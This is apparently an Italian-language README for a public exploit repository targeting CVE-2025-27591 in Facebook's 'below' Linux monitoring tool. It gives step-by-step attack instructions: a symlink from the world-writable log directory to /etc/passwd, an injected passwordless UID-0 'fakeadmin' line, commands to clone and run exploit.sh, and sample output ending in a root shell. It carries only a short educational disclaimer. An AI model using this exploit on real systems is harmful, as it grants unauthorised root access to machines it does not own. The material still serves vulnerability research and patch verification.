
🔥 Exploit di escalation dei privilegi locali per CVE-2025-27591 | Abusa della directory di log scrivibile da tutti in Below per ottenere i permessi di root tramite iniezione in /etc/passwd
below🛑 Disclaimer: Questo exploit è fornito solo per scopi educativi e test di sicurezza autorizzati. L'uso non autorizzato potrebbe essere illegale.
below è uno strumento di monitoraggio delle prestazioni sviluppato da Facebook per sistemi Linux. Le versioni di below precedenti a una release corretta sono affette da una vulnerabilità critica che consente a utenti non privilegiati di escalare a root sfruttando directory di log scrivibili da chiunque e una gestione non sanificata dei log.
Questo script Bash esegue le seguenti operazioni:
Verifica della Directory Scrivibile da Chiunque:
/var/log/below è scrivibile da chiunque (una bandiera rossa).Prepara l'Attacco Symlink:
error_root.log esistente (se presente) e crea un collegamento simbolico a /etc/passwd.Costruzione del Payload:
/etc/passwd:
fakeadmin::0:0:fakeadmin:/root:/bin/bash
Attivazione della Registrazione:
sudo below record per forzare il binario vulnerabile a scrivere i log.Ottenere Accesso Root:
su fakeadmin per ottenere una shell root senza richiesta di password.CVE-2025-27591/
├── exploit.sh
├── README.md
Prima di eseguire l'exploit, assicurati di avere quanto segue:
/usr/bin/below/var/log/belowsudo per eseguire: sudo below recordln (per creare symlink)su (per cambiare utente)timeout (per controllare il tempo di esecuzione)whoami (per la verifica dei privilegi)# 1. Clone the repository
git clone https://github.com/00xCanelo/CVE-2025-27591.git
cd CVE-2025-27591
# 2. Make the script executable
chmod +x exploit.sh
# 3. Execute the exploit
./exploit.sh
[*] Checking for CVE-2025-27591 vulnerability...
[+] /var/log/below is world-writable.
[!] Found existing log file: removing it...
[+] Created symlink: /var/log/below/error_root.log -> /etc/passwd
[*] Writing malicious line to /tmp/fakeadmin
[*] Triggering logging via 'sudo below record'...
[+] 'below record' executed (or timed out)
[*] Attempting to write payload to /etc/passwd via symlink...
[+] Payload successfully appended.
[*] Trying to switch to root shell using 'su fakeadmin'...
root@target:/# whoami
root
| Campo | Valore |
|---|
| ID CVE | CVE-2025-27591 |
| Gravità | 🔥 Critica (CVSS ≈ 7.8 - 8.8) |
| Vettore d'attacco | Locale |
| Impatto | Escalata dei Privilegi a root (UID=0) |
| Tipo di Exploit | Abuso di Symlink / Iniezione di File di Log |
| App Affetta | below – solitamente installato come /usr/bin/below |
| Causa Principale | Scritture di file non sicure in /var/log/below/ senza controlli di permessi |